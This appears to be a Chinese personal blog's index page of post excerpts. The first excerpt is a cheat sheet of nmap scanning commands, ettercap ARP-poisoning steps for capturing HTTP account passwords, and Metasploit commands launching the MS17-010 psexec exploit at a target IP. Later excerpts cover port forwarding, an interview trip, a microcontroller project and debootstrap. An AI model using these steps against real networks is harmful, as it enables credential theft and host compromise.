Yumi's Blog

NMAP扫描

中文文档：http://www.nmap.com.cn/doc/manual.shtm

nmap # 帮助 -h可省略
nmap 192.168.1.1 # 最简单的命令
nmap -v 192.168.1.1 # 提高输出信息的详细度
nmap -vv 192.168.1.1 # 更详细
nmap -A 192.168.1.1 # 启用了操作系统检测(-O)和版本扫描(-sV)，以后会增加更多的功能
nmap -p 1-1024 192.168.1.1 # 只扫描1-1024端口
nmap -p 1-1024 -A 192.168.209.0/24 # 扫描192.168.209.0/24网段主机的1-1024端口，同时启用系统检测和版本扫描

ARP欺骗获取账号密码(ARP欺骗和MITM攻击)

ettercap -G # 启用ettercap的GUI

• Sniff - Unified sniffing - 选择网卡(一般eth0) - 确定
• Hosts - Host List - 选择两个目标(一般是目标主机和网关)并添加到Target 1/2
• Mitm - Arp poisoning - 勾选Sniff remote connections - OK
• HTTP账号密码会自动抓取并显示
• View - Connections

# 其它工具和命令
arpspoof

MSF入侵主机

msfupdate # 更新msf
msfconsole # 启动msf
help # 帮助
search ms17-010 # 查找ms17-010相关的模块
use exploit/windows/smb/ms17_010_psexec # 使用模块 exploit/windows/smb/ms17_010_psexec
show options # 显示选项
set RHOST 192.168.209.129 # 设置RHOST的值为192.168.209.129
exploit # 发起攻击

其它资料：https://blog.csdn.net/qq_29701419/article/details/48975769

场景

我想把家里监控的80端口映射到我的VPS的80端口上，从而能够通过访问VPS来访问家里的监控。

路由器是极路由，已开启SSH。

监控IP为10.0.0.10，端口80。

前言

面试前在牛客网翻了好久，没找到网易运维开发的面经……网上找到一份面试题目： 网易2014校招-运维开发工程师 。还是有一点点用的。

4月11日下午的面试，我4月10日下午从广州飞过去的，4月12日早上飞回来。网易报销600块路费，多的我就当旅游费了……吐槽一下南航，机舱好热……28°C……这是人生第一、二次自己坐飞机。

前言

GitHub: https://github.com/chn-lee-yumi/8051MCU-game-console

单片机课设拿了满分，嘿嘿嘿。

2022年用来水了个 B站视频 。可能是视频标题起得不好（我边打飞机边摆烂了你的单片机课设），2023年换标题重发了一遍。

首先，你需要知道什么是 Debootstrap 。

然后阅读此文档第一部分： EmDebianCrossDebootstrap 。

我们可以看到有多种方法可以实现我们的目的。我的路由器CPU是MT7621，是mipsel架构的。